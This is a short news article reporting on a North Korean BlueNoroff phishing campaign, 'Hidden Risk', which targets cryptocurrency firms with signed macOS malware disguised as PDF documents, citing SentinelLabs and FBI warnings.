North Korean Hackers Launch 'Hidden Risk' Campaign, Targeting Cryptocurrency Firms with Sophisticated Malware

North Korean Hackers Launch 'Hidden Risk' Campaign, Targeting Cryptocurrency Firms with Sophisticated Malware

North Korean state-sponsored hackers have expanded their tactics with a new initiative called ‘Hidden Risk.’ This campaign aims to infiltrate cryptocurrency firms using malware disguised as legitimate documents.

According to a report from SentinelLabs, this effort is linked to the notorious BlueNoroff group. They are a part of the infamous Lazarus Group, known for stealing millions to fund North Korea's nuclear and weapons programs.

These attacks are a strategic move to extract funds from the rapidly growing $2.6 trillion cryptocurrency market. They are taking advantage of its decentralized and often under-regulated nature.

The FBI recently issued warnings about North Korean cyber actors targeting employees of decentralized finance (DeFi) and exchange-traded fund (ETF) firms. They are using tailored social engineering techniques to do this.

The latest campaign appears to be an extension of these efforts. It focuses on breaching cryptocurrency exchanges and financial platforms.

Instead of grooming victims through social media, the hackers are now relying on phishing emails that look like cryptocurrency news alerts. These emails started appearing in July.

They disguise themselves as updates on Bitcoin (BTC) prices or the latest trends in DeFi. The goal is to lure victims into clicking on links that seem to lead to legitimate PDF documents.

But here’s the catch: instead of a harmless file, unsuspecting users end up downloading a malicious application onto their Macs.

This new malware is particularly concerning. It cleverly bypasses Apple’s built-in security protections. The hackers manage to get their software signed with legitimate Apple Developer IDs, allowing it to evade macOS’s Gatekeeper system.

Once installed, the malware uses hidden system files to stay undetected, even after a computer restart. It communicates with remote servers controlled by the hackers.

SentinelLabs advises macOS users, especially those in organizations, to tighten their security measures. It's crucial to stay aware of potential risks.